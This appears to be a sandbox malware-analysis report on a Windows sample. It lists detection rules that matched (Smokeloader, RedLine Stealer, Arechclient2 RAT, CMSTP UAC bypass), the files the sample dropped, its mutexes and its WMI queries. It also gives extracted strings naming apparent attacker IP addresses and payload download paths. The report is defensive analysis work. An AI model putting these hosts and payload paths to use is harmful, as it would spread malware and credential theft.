Source: 13.2.run.exe.3e5e86d.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 27.2.MSBuild.exe.1370000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 14.2.cmd.exe.5770976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.run.exe.3ea2d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.56bb264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.5677976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.run.exe.3c1ad5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.57b4264.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 6.2.cmd.exe.60b00c8.8.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.cmd.exe.5d800c8.7.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@42/65@5/11

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Code function: 1_2_6B0D7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6B0D7030

Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe

Code function: 5_2_000BD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

5_2_000BD660

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_04265BD6 CreateToolhelp32Snapshot,Module32First,

0_2_04265BD6

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe

Code function: 5_2_00098040 LoadResource,LockResource,SizeofResource,

5_2_00098040

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6808
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4312

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

File created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Jump to behavior

Source: Yara match	File source: 17.0.u3bs.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.2777480035.0000000000401000.00000020.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2778288110.000000000720D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: eight	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: eight	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: @	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.90	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.90	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.90	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: Installed	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: Installed	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.59	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.59	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.203	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.203	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /syncUpd.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /syncUpd.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /timeSync.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /timeSync.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.203	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.59	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /timeSync.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /syncUpd.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /1/Package.zip	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /1/Package.zip	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /1/Package.zip	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .zip	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .zip	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: \run.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: \run.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /BroomSetup.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /BroomSetup.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: 185.172.128.228	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: /BroomSetup.exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_05D14C75
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Command line argument: .exe	0_2_05D14C75

Source: TNQTc6Qmkg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2544
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6192
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4196
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7032
